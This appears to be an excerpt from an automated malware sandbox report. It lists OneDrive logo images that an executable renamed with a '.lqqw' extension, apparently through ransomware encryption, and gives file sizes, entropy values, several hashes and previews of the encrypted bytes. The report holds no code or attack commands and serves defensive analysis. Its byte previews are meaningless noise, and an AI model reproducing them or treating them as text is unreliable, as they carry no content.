                                                                                                                                                                                                    C:\Users\user\Local Settings\Microsoft\OneDrive\LogoImages\OneDriveSmallTile.contrast-black_scale-200.png.lqqw (copy)
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):1971
                                                                                                                                                                                                    Entropy (8bit):7.897190832869648
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:48:lliXDEmjIOoCUDKWqp3KIX8+k/ORsC5NhfiPQjH3X2i5sR1D:LODjqtqVxfNRsGfiPQjXX2lRN
                                                                                                                                                                                                    MD5:904235B51CF57765DA951AE2C2B2A6AD
                                                                                                                                                                                                    SHA1:4964DC9C7818D96F9EFB0B334BF88631304C51BC
                                                                                                                                                                                                    SHA-256:8958A4FFEC82EA99B896C1CBE65EE6296E991FDDCA7BA9CFC567125655735CDC
                                                                                                                                                                                                    SHA-512:590EDB5F88D8AA30A0895B5B576BAC96CCB765CA4D581D6E69A064274A5093F97A4F7B7C30CD40769A90AAC8DC4073B462DF27441E021958C285A17348E9AEAA
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: .\.ug.7[....z/..#.:7.j....K.t.?<..E.].......J[..d....%..UapoQ)n.....,`..}.O.....$........n.zF...-=P.,j.......*.H./#_..VTo...m.6hka&Qfy.-.8e...i.J>V!.....KS.(r7...I.........t..]v7...|C.g.G/.5o.Wa...m.....\$.....BU.....t..C^.....|.u/..+.0?.]...x....z;..?.'=.}n<.j.-'..+...)......5.O.\f.~..T..j..7....3.F.M8b.3....l.../.}...........VjuRc.)......5.p..$.e....q....uq........:..\.....E....L[....R8...xM.. ...;.......(..V.`.~...1/.....&...md...}y..1l&.e-.)..Bv...>.....6B.[g3z]SEpt8..T..a.h+.A.v.f4x^.*1$.N.F.o..z...(r.(.O5..5:9.2.^...Po....{..x....m..a......b>.YT...8.3|.j.(.Jg....i.v.Xwm..]....*H...8.j.-s._.. \6..Y..J..#nU.A]...s..r....ei-^..We.p7...h.......o.......%T...A.c'v%_...w.sR.:#....Ae....N.f.n[....cg......1...-..K..Y]..d9.\UQ.HP.9"0.2.l.m.... z..0....?...ao......A..{...E:.l...).M...{=..?o..:.8.{....NJm....).......nvL?....G.M..g....x...B..N_...=....[..Z.E)......_by.XF....b.:,....M....Ii./.'....]>M....U.C&f.|J.'f...%..T,...j*.C.<..K ........)
                                                                                                                                                                                                    C:\Users\user\Local Settings\Microsoft\OneDrive\LogoImages\OneDriveSmallTile.contrast-black_scale-400.png.lqqw (copy)
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:PGP encrypted data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):3805
                                                                                                                                                                                                    Entropy (8bit):7.946994291293712
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:96:b4/L8zY31/kYQnO6LfvRqq7t+tKracs7LPk:b4/3l8fpqqvaLns
                                                                                                                                                                                                    MD5:DC80A3858A91A0055167B4EB35BA1357
                                                                                                                                                                                                    SHA1:54CA9B3D75D35C528264B51E88B1AE48A986578B
                                                                                                                                                                                                    SHA-256:FC1AB3E885BAA9BE28BACBB818FF121C2F8E433D7F7BBB5356E563FA9C41C04F
                                                                                                                                                                                                    SHA-512:C0725DB0E626B7A12037AB1BA76696AE8EDBC6B7DAC8A0287B2D79F45A73458822979B73AA741297CA5A294CCA5DC50206DAA9A9689A5BA9C963533A60FC3FED
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: ..s..`R5.....`...d...|W...~V.Y..........l.2q./m..^D..(#...q...,.a..r..X....}.R.+...Zf...?.|...d1...q.Q8s.s4........?.'..b{N..._....wP..E..a.s......l....Y...."..M..W....x:...+..A.W..T(ki..Z>..m.i...+..$.d.....d...S~...o...~.d..u..1..^..v.W..z..x.>.Gz..v....~lc.P.....\..y...&...c.F!...Pq..W:'.h..;...).sHO.0,.S.=..v.0..@..0.... d./.Qu..-.v....v.`q.\...k|.n"..&..k...ouMpy>..Z.cS...4.J..3..2.k.g_}[....;Qv.LZ.+%.S`a.Ev5.A%0.....k-c,.W#..u.W..au5.?B~.....Y.......T+......<.YE....../C1.nv.......d)..v...j.....{Z.e3..^...T...s,,.$.G...<..O...W.YD...%KD.P".../a..NI..S..a.......mrq.....M.#.b..A..&..]..q..[.."....~\h...(K.. .[..u.x..H....xW..T..:..7..s....,.....1-z....v.L.s{.&..v bzU>.~.... sZ]p]..*.. .|.K.Wx@[G.k..(.}^....l...'~u.>&.g..(v;3.G...wV~.....JT.#.g...V..P...........T..~..w......CN]......F....VGW.P..J-h.<...gv.0u.Pt.......H...`.......jvf2.....!a.B.Rq..a..gj..1...y.)j.5tc&?...X.....l.ucy.....M.....}S....lA....E..O....n~....1'..7.
                                                                                                                                                                                                    C:\Users\user\Local Settings\Microsoft\OneDrive\LogoImages\OneDriveSmallTile.contrast-white_scale-100.png.lqqw (copy)
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):1112
                                                                                                                                                                                                    Entropy (8bit):7.816294319300947
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:24:EIjqq/Sg2oX1olsDaYW0rMp2/NG4wcxx+GscbP5xpd3fbD:EI24v2/sdW0aKGRyx+GnP5xpd3DD
                                                                                                                                                                                                    MD5:6D27C1CE663A9CEE554433E7A50378CA
                                                                                                                                                                                                    SHA1:69504804CFD460A7B949F9E17FD6E8E4A22493C4
                                                                                                                                                                                                    SHA-256:7F168B2162B954C2460F7454C36BC25F92A8E3CBA290E44C0E6FE8C727265D1E
                                                                                                                                                                                                    SHA-512:C8E8652342F9B93428B8804404AA6B14F7A5D443A09708FD622E70573BBD11DEEBDCD1EE69B7DFD53D4AC88EC7DCB62FFA1111D501043CABAD2E081E3A7732CD
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: .xo....@v...i.T^...IQ.5.".....-rK.mv.=.."..5...z.........0...[G..".....4(..&<..f.O...Bc..o.Md...."../.A$..A..N...\.W.C..K~~M.3>T..q.#..T.....3.p.....h..|4h.YQ.....2.e`'..........+...Z+..C.................F.^.?W.".T...X\....5.7...k ]..`.P.......V..}....n........ ...|WG8.@*E.......M.4x9..{.&\.%bm.J..'.m..C.......J .<..qe.,#7.m..tb...S.ubo.\.g.'...|.X........".h.$e.....0..b.....hk.......Y.-....;..J..?......,gU?.C@. 4.=...........{a._1......0...=.;..^.$^?j.pv~.cS?z%..@.`.O.....V=OW"....!....GJ.e.&.'.#.....Q.X.....$...xF(._..R.9..Uy;#..X.F.0|..I..'..........;x..(.h.Yt....w.f....M......Y;.A.rFG...y.f.dp...9.:..A..G...5"....{..R.P...h./.N...lF.?H! ...X.....Z,....g...YY.....E..I......L..K.=...^........v.>px..........a.[.4.......a-.^...wU...d....x..\. i....B..T..D ....L+/.c.}0...yo.RK9.v...cS..P...;.&...M!H)%.bz`.....f..pr...k...i0.\T.0..kL..qT..yS..8.S....?O..cR..7....n...............%..3A..i....y......J.#....../..'T..#mj.0L...I#y...q.;Ks..2.@+.g
                                                                                                                                                                                                    C:\Users\user\Local Settings\Microsoft\OneDrive\LogoImages\OneDriveSmallTile.contrast-white_scale-125.png.lqqw (copy)
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):1347
                                                                                                                                                                                                    Entropy (8bit):7.8473108691228415
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:24:mYPTvQ874dXgKor2fCx1S5ocxyINOLz4CbwIwZMc0ZLbD:hPTvQ80dwQno24MZ61D
                                                                                                                                                                                                    MD5:C1AD65ABFC8E4CCA7005BF65736EEF58
                                                                                                                                                                                                    SHA1:76B2A8276DA0E1DB2BDE1CA62D1787E8988EC78D
                                                                                                                                                                                                    SHA-256:5127CC21F70947584123E8766CBBFC841ECBE376C1280EE801CD4E249B0A16AD
                                                                                                                                                                                                    SHA-512:1396B812E5103440CCF3AB4FF0D86C4F469DACBDE5F4995762A15657B3EDABD73CD5A1C47EB261012EDE0CDB6DE9A3BBEF5AE8372F655700D2B6FB77CB370C11
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: ..a.*3h2...7Q_..+Qd:..[..71:...zG..F.......Vm..*....._W.L.....Q.......D.K...F......s.[~.[...;....F...h#.6..(h....kTZ`.HU.q......".(.]Vnp"...L.....D......I ..&..L..f..n?.J...P...j.1..R'.+.....N...T.lL._..{:'OuSzH.&.w..7r...........Z..Y..3.....5......+....5o..m".R.........\...k.~I....l...aH.Z)t..[..,..7.Cam..G.w.S._e..J.o......KL.Zo.5-..P*."u....d..1.5.F-.(..^.5..e...~.glUV..^.$......H5.<\).<...WQ........s.....d.)Z..o.&..........uaB.S..K]Q.'j.Q......G..i...,.H.<.~........?E.9.YF+..*.i.?.e..?...w...P.x:...Y.VS/..2..u...;%.....~<..f....L/.'. .O*......\$...Re.K.G..s....h.;MsqmoU..0p`o..^.;.#.....o..}..g._TzJ..^0..1..1..}]....0.+....Etva...*.8....M..GK^.b.G.....A.B.....[...h.N..n.,...........]......1.<T..~.A..O..Z....._b....{.2..v.......x.^.../.[..x...S.....gim..X.#.,.n.....g...Q.....(..UW.Z77.U.Qm...=..]0.B....3h..... |7.y.$..nF....A.zt...6.4.I.U..F......3.X..z.O..L...mg...._i_bx.#!p.....`...S%..W.....29..n##gd7.ji..Y....v}.o......_....
                                                                                                                                                                                                    C:\Users\user\Local Settings\Microsoft\OneDrive\LogoImages\OneDriveSmallTile.contrast-white_scale-150.png.lqqw (copy)
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):1531
                                                                                                                                                                                                    Entropy (8bit):7.863500395043178
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:24:JEgq1zychSAMDBjqmRUd8E8Z/35X8Kw4WOMAguuBcCK/SOILbD:Js1zyu5MA8F44zMAgOb0vD
                                                                                                                                                                                                    MD5:DF170CE91505BE1B117D89948AA3A8BE
                                                                                                                                                                                                    SHA1:9CB71EBC716FB09FFB7EE54E8F3CDEE365D5D49E
                                                                                                                                                                                                    SHA-256:D89753F3D9C8E63ADE3459DDE24F3CC3E5B27CAED00B6FF8F5D6AB91E5B62943
                                                                                                                                                                                                    SHA-512:FC56F859A97B4F1EAEE99E4FC916F6BDA7CB96FF66722763101122E527D8DFE54E4CBC855FBF17317ABFCF82ACAC7A4B809C404DEA59B2A1385351DB2820BB19
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: ...<...)^.e..~........Y....puf.....o6]..._.........S...O...p8.T..a}.5.....18p `.....m.......=Q".......vw..\...6.....U2.....pi..Wq.y..Y...4..n&y..E........X.S`..?e...V.M........4.f.MB...a....m.....cx...W...?H..\GO.F.8.O-....i`.......!...r.P!|.v.!....H. .M...k9/@e..B...UH...'.&Y......-..x/9Q...|Rf....7y`*..5.+..V0a@RlJ...q..7. `)4.,.N.[S....d`..z....._..I..B...~....5...#W~......]Rd....+A..h.63........S#.`&x%.ay.~(Cg7 .<....R&1S..7...+..C....?JP....[.5n}.?..;..[.S.Y..o.h)..0...$..N..>s..h..B...........a..s.rO.#fW.*q...w.......].H9.4A..."..t.....:....h_.......g.A...[.a.`@...%.Z.&8x..[.......q....T...2.....}>E'....$>...r_j..."..#q..h^..l.pQIr..df....E.&_.=..U...o..s..@...u..y.S6.}.x.f.I..f.z.c.WA.n..;t..Z..........q....\....T.p.......1]6.r.G....T...*.".&.6.*....v.){K.$./..I..To...=E...7wD._....a.l3.1...{...........O.^B....j..<v...\.-.xm`.|G|....L1.<xI+.z..=..?@...U+..8.;!..C..BEH.7Uf.sR..A...M...FTT}.>...H..td`F.....`L..Y!7....... *.e..<.0.
                                                                                                                                                                                                    C:\Users\user\Local Settings\Microsoft\OneDrive\LogoImages\OneDriveSmallTile.contrast-white_scale-200.png.lqqw (copy)
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:COM executable for DOS
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):1971
                                                                                                                                                                                                    Entropy (8bit):7.899012635429621
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:48:PCJ4lTuYcp4D76mFRojOcyF3IQFIhp3K6i4G8CD:PCaowD73IJQep3K16K
                                                                                                                                                                                                    MD5:057BBD17D5F0CF349BC524FAAECD9996
                                                                                                                                                                                                    SHA1:AEC7EF360D211772E3A34EF4F7898D7A2A07109F
                                                                                                                                                                                                    SHA-256:B6B68EF651D88C77EA8B68C68CEAB2BC3541E42A5218E1B728AD72E90CEF8526
                                                                                                                                                                                                    SHA-512:2810A52B6EE65F9D604E5FFD05654F1B805B60E554F6DAA304CA9130F3B214021BC674390C43ABF09E010D98372E627106926A9DEDB0979A31D0B817FAAAD453
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: .\.....3.3......./.......V..2....1...:.h....y..E.. `2.v^.B.%.\.............%....r.vk...v..S..|y.f.>R%i.:......`.k).P... ...@B2c....!...).J.3.......T..bLG.5..n..TA#......Rge....]8.....R.....*..=..e.K.}..J'.yJ.h.....V.>.5}.aW....K4.. ".S.z.3.^H,....A*.....o_;.....X9.D.1.vy.t.TG./A3.7\.OQ.H..;...*.#..P..i0y/....+.....z..+y.9*.Sc..!...N...n9=........:&...0m.S.X,.'"....w...!...x. #...(.%!....43.o.....b&fz..6r.....o.yg.../Y&....r.In..e.....F6...m=.Pg.V).h..~.F..M.A..RG..)LU..D.'OqM;../.s......RD.GS........u......r1P^.>...i...".3v...W.T!i:.&2]..l3<;y...C..."H.....8..7....i.oFx.;..?`..f.^.....$...=....l.w.3l...W....U.,..M7....b..j..I.. ..2.}..qV..c...-..?.,..k......z.^-.;..!.^..4..................J%*...gs...E2.a.j.p..'.v.t.@9...c..hPIS....M...../s..g".g..T.+...Ue..d.4.!D....'z.{n9.H....2h.F..f.KJ..(..!.M.@.sW=..t.....jl.<.[.)..W.....n...V.......U..0........H.k%...&bNs...W4..);Y|.A.Q.T.....,.w.n...EI\k.E..x4.g..o..G.....e.K..-y.Jn.V...#
                                                                                                                                                                                                    C:\Users\user\Local Settings\Microsoft\OneDrive\LogoImages\OneDriveSmallTile.contrast-white_scale-400.png.lqqw (copy)
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):3805
                                                                                                                                                                                                    Entropy (8bit):7.944936054705722
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:96:pRDN5jlLQQEuJWR4GiPvH0pHj9N60mhd1z5YWsSa:pRDN/IuAtiHUhjNmhf5Y
                                                                                                                                                                                                    MD5:E5B239BBE28C1704BC925300A6137D66
                                                                                                                                                                                                    SHA1:F77F7846B324D3D84BDA69CCEEC6C4F30705AF86
                                                                                                                                                                                                    SHA-256:A9E8047841B8D0724315ACA4105B82AA160C63B518ACAA2694B5D07CB3AB333B
                                                                                                                                                                                                    SHA-512:B6B3F4EB9943084ABA2A5F1F167661F1D19ED2F50F80C2E3D2659514F6EEF007B16BBA84636CA55E6611502E5F6C813D60B3DBE1699590437B1A5EFA43B7B02A
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: N.?Z.;H...fm5.O.n.`.'..S>p..+...?D..*.I..%n.n..k..]0/y..@..=}....W...l!.~.gJ;H.V..e%-.../.!y.[........R.s.r.....[.........9x...p..:M..y../%w.t.d(nH.]..J. ........{.W.k;............2........7c.J#.'f..'m|.X.{......8X.!".f,..c.Z.0.4.56.....c...|`.f4F..ao.&.^_.w.R.$..v..XS.0...l.....JY*...Of;.....-.:%...~$.......i..{')a.o..:J8#s..88..e...h....Z..........6....__..W.....x].R.3V2.......@..9^.x.t....$a@.Vy.1*oy..gO..(.Q.4Z%;q.)B..-|`...a*0........^1Y.N.g2...dk.....<.{...L..c...*..c.......?........v........Yv-0b..$.]..l.E~m...2*.Ko...,Bd....u.....ah..m...5.......q.\\./z/6.om.<.../n.."I.r.....R.~......1..h%&v.=..h...U.]......5X.)..^...yYS.,./q.L?K..c*.d.........y..;..;1.....oZ.sN...bc".lW..^3.<.jM..H..kK...lA..Q.o..W......1...B.0......U......o..oT%~..z....3.;L..I..7[.....B|.G...Cq...(.M.ehld+Z...)^O.j6+...0.^.W.,.s'C...$.Z+....l..3..._..jxy..\.&.vO...D$.1..I...0.2..F._.,..k.8...3..C.....L.%..X..y.t......I.Z..gMmM.&.`@.*];eio..ZT.. =&{...
                                                                                                                                                                                                    C:\Users\user\Local Settings\Microsoft\OneDrive\LogoImages\OneDriveSmallTile.scale-100.png.lqqw (copy)
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):2304
                                                                                                                                                                                                    Entropy (8bit):7.92295748810711
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:48:ab979KzqV8ALe+N5lHgqUTHYhgmnZbQiSwm1U73HD:yhKuVxxNPA3YhgcbQiY1UTj
                                                                                                                                                                                                    MD5:F90EB15ED75C37CA902B8459A6FCF934
                                                                                                                                                                                                    SHA1:EE5517537B79D4CA77643735ACA6F499058B8EF1
                                                                                                                                                                                                    SHA-256:E3A9E43AC080BDB5B95FCA06FEF109CE5642C80C903F5E690DCC58A41775501B
                                                                                                                                                                                                    SHA-512:BCBE3A6B607E648501685A3D75728EBAA53AA5976825CD929C8FC7CDA5E92146F522ABCCD8382830C6B77BC0346F5C00974B24A5F86670EC4E22367CC9508DB2
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: `.pS.....]..Q.J:....>..;1....e...]....5....X.e..T...........d....}`...*y.s....../z..I..L8...U<.......0.y..=/."Kg....\..w.X}...h.H>.#|...-\..2W.....q.yN.o3.-{.j("...6....g...M.#.....q...n.M7E...(.V=8F.=_b.>..{.W.}.\V.+...w.EB'....)..5.h.....%.:.@y/.q)....&]HO.gV..'..N..<... ......O....>.a..M....r`....dA......L..I,.:.JCwR.+rw7;..j5u..`M..l..:...vr.BD..D...H]N.!....0.8/....V..%h.zw.Te..t.....[GV.9.~oB26...M..W..a.F0...qe.S.F..)H".}.@\\j{.M..[...e,.'x.z...O...ZG[...0.%...........(........S.Y.Q..r..#.'3.Yj.d....D...H/..!......s..v.F..Z&...4i..".n.3.......Y-.....#.;.w......6.E^>..:B'.W.cI...9.[......2:.&....K5F0 .P...(.P.gYK'NJ..qI....(I.......h.T....4YN..B!*A....zX.....*..c..f...W..6..wXp.4tW.-;.._.Sm.....n([t.XM.p....v.u...ol....{..=..wm.P-'.k.R'...Ov ....@..C.o$....T.yQZm.....:..)..W.,[..p....Z#...Exd..(;pa..w.{.m...(.4....2" bu.e...N5..A.......d.I.H...).:4zh.../....P".,....vA..4!..T[H.../sL....">/>_...R6..\..g[...u]S6i.S...G..-8.M:.J..i...Q
                                                                                                                                                                                                    C:\Users\user\Local Settings\Microsoft\OneDrive\LogoImages\OneDriveSmallTile.scale-125.png.lqqw (copy)
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):3194
                                                                                                                                                                                                    Entropy (8bit):7.941127140157345
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:48:PX8qLtWHcD8rUtfZQtgIe2fUoSUi3wkkCfHkCnARjQa2oWoiZdo6ZXk2/lMX4O7D:PX8WogzIemovjvkYAdQa2oW3ZdXlhU
                                                                                                                                                                                                    MD5:63A4864E6CA5AC542A1ED32ED49384E1
                                                                                                                                                                                                    SHA1:560755AF6124E4EC0400705ED64437171AE362A2
                                                                                                                                                                                                    SHA-256:EBAF2A2CCC2998D28817DDDFF522916742BAB81A14494929202A5A61D5FA9244
                                                                                                                                                                                                    SHA-512:5869B0AD5F177729232CC28E6F6B0760476E392475E4B291BEEC682397C83322CE39F7BE567FF452D027DF0C211EF8B715C3C11373F4D5BDE4C59A5FC3F3A2A4
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: -Q.h>.;.T...E..~....'.......3.g.Xu...SXn...D.1....@(dg.+V~.c.NX.`..V`G..(4g.`S...k...z..../^~.R..|.l/.fG.&.@.rg.........C...'.a.p.P...7FW.,m.xPS.+.r;....8W....,Lx....{u%.T9..H.....(3u..z..z.k.H.w......8...iD.Q.....2....+.e...!/;(.s........Eg2.x22....a....6(..s.I...]}..6.uI....!...d.W..h.Y.2t....1..)......N...3...O."&..........J=..n...H.{.=...].k../}"v.+..(.=46)T..-UOH[>X.f...$c....[...4...b..O.6..iLx.r.(....r.PL.....T..?%.......kj.........z*.>~....;.......'];:.i....=.........da+.T.Q........p~.(..:.....dx.......%.........p61...%....?....k..v....s).n..R..Y=./.A.m..........Y...%)..s.p-...z.ZO.>;oN.#.0.h-`......$}...+.M./.F^.J....i....S.Z.6;eV5).73...j.{.........p..../..1.-~k\......d..._Wc...r...a..h.%.b....B.>u..uG$.;....Q...N..1./.dc..w..8X.H...,....V..c.)......R...........\..+shJ.F6....U..K..|..O.)..MI?..S..2...$.R.V..t(.....d.....k=...77^l...p...........2.. \......hr...Gog...&[..P.w..S..,.-2.[.........SXI ..!wA....x..f.E..3.
                                                                                                                                                                                                    C:\Users\user\Local Settings\Microsoft\OneDrive\LogoImages\OneDriveSmallTile.scale-150.png.lqqw (copy)
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):3817
                                                                                                                                                                                                    Entropy (8bit):7.948686268815618
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:96:Mo3rIMl2yuUoDh+HfSy5PW6EzXczTC7Mr:v3rtdu/cfS2PrEaGA
                                                                                                                                                                                                    MD5:ACA3989232F8E0306CA9C438C1EAEAFB
                                                                                                                                                                                                    SHA1:BD871B6F0DE624F87447B8677AAE3B912BD0C7AC
                                                                                                                                                                                                    SHA-256:BA2003195D9E596A52E36167B411FCC73B9B589FF6A187BA30181F494876AEE3
                                                                                                                                                                                                    SHA-512:E238C804BA3363500207FE13B90376DDD0B0E90808FF9DF1856CCE3CD3B3C6EA7ABD3792508ACE905EF99F5EB3E416E9BC472CAA98DB8CBCEF734015071A1FA4
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: .a.YR& +`8.+^....nngE[...SB....2v...w.B.>..7.2...vF...m?..r....V,...f..4z1K..V....V..].I..F...#.X.........r..R........J... .^C...+`.z&%....U.4.~.9....|.w0m...1>x~.Z.;z.-(...].r.B.r..G.-....r..<..../.]A\._.......Q.b.L..,....46..p.... /G..9.l.B...IJoG.z.jo.`....P...uox.....G.x.w...*..w .6.?^.(.............a. .t....R)..`g.k.......}9.pV.'^z.F..f....j.bE....}i..........!B...gb.........5)..aY..N....h.......3..@i7#....b}~*..5..-*7...o.a...I..+..x.S>E...mK......~.6.......h.'D.g.\.S~(.)..=.U..j<Y.E.S..".m9. .c../..:..}..c.~q.8..F.p.....t.k..j.%...6....p...x)....i..W.6OLe.!..9>.i/ 2...w..?S.J.Z.<.1.W.......j..7+.I.nZI_+Q.........V....IY..L.^....LQ.....?n.>.P....b.p....b...$Zt...I.I..U..KYk.;w..FY..9{d........:o.UMI.C ..>.x.4..V#.!..X.=.w.t=.$..9.IY...q...D........;...5=.GX-.y...c......v.l.Z.....J....h.Wm`./..x.u.X..LB..L.?q.MxQ.......Q...8!.^..]....D.y.A.[z.n.2.@q<.....f.Ht...l.....X..,..."/d...%.[<u.....2.;.t.@..v.....6....D.<A@....-.P.l.~C.
                                                                                                                                                                                                    C:\Users\user\Local Settings\Microsoft\OneDrive\LogoImages\OneDriveSmallTile.scale-200.png.lqqw (copy)
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):5116
                                                                                                                                                                                                    Entropy (8bit):7.9561094152171155
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:96:W1anZGg+CkrAljvw/7CQWHaRNp7rGO9lGC+Pw2UkVhKWqAsLY+69szYqPxS9:WwZ2rH7ChHuX0tUkVIDVYp9sFxS9
                                                                                                                                                                                                    MD5:0B5C2B6B7D0FD3B167E244D0D4DDDE8F
                                                                                                                                                                                                    SHA1:69530B440C1E8B665E1F455B3AE31048689812F0
                                                                                                                                                                                                    SHA-256:B8EFCE34F4B954A37DBE76DC66EC33722BB5FC0D23B103AD7D323BFCEFBF5559
                                                                                                                                                                                                    SHA-512:5DCAB094FC3859CA3748BE11C97A2E702832888A26C4C285C5004AB8DB269F85F98FC4A5C7AB58D3355361D8B666C221FFDB90F3E429B1D400FF096265EC7A48
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: #.o ,.^~SN.V..G).^.A..J}E.,1'.6.{..B6..u&/RZT...J./..!...V.Y she......&Kuo5.....*.=.U`V.....9.J.p.n.?.+l..B..U.P+b.:Y..w..^...a..#..~B....vp#...F`.~&.*. .......<_t.:A..d.R!.y.Q...@..~0?K}].4."..).Q......T*.90..^...t.@q....IX...'..y..E..4..e..|+Rr.X.F..[.......m.....tWI.S..3..c%U..u..].R.D@...I..=E..[..[4....*...eu..=..+j..7.|...T.#..b3...K_K....~m.r.@.x.mx.....lM..k.....8.IVhK....z.Z.*.$p....[GY.SQy.9|....~ILJ=.CN`..GD..?........8......4.3N.%.g..;+4h.8...xkc...V1s.|..j.!..$.f.h..Y%{X.B?..s.0.]Gq.{.j.#z...Nq...F......R..>.c8z.ja..$NO.p.#3f;..@.x...:.C..(.....@......4........E0nY.h.&.h.BP.+.n.a.!E9Dh|..O......T...@. .M.!.f......&t..2.84w.A$r./..'...]....}..6.;s(.6....y\.*.@.8..r.!..D....d......EK...BD.e9V.7`..y}...S..W...{...?%..q...A.U=.x|m<%[...W..QJl.....Ar..y...Y.c..gV'|Y 21..9s..w..bT......nZ......1Jg..P.p.O..`*..Ev.bBo9....7e}..@.".<....&E..a.l.\Y.+zG]......!..8;.y.:..K.+.R...t..F?..*'8Scu...6:..I..(...3..V...M.^..C\.Y.4...'h..p......
                                                                                                                                                                                                    C:\Users\user\Local Settings\Microsoft\OneDrive\LogoImages\OneDriveSmallTile.scale-400.png.lqqw (copy)
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):12172
                                                                                                                                                                                                    Entropy (8bit):7.98422017680248
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:192:5z2s59a56zyJZIhmS7sgFjvmtS1XB9zaDbilmJZ230nFQLyXesayl5uTbAI79aaD:5ZXA2semtSxB9zaDbilmi30F6yuvyl5Q
                                                                                                                                                                                                    MD5:F747C4227CDF0224208DFB80BC8A0430
                                                                                                                                                                                                    SHA1:E30F0CF47EC6643812E705FA1A415533DCACB4E3
                                                                                                                                                                                                    SHA-256:DA2FB171B73F6BA9353AB915359F68F477B9F9F4175304A2EFF7D1E5F48B98C1
                                                                                                                                                                                                    SHA-512:5B20E1C34F0D65802DE1E4118859EBC140E1F50DB5EB831BCE559C4C49E236B47DCD02BE39F14A8831F95E09AF177425D9C5BFD01D72885232DB73D4BC63E571
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
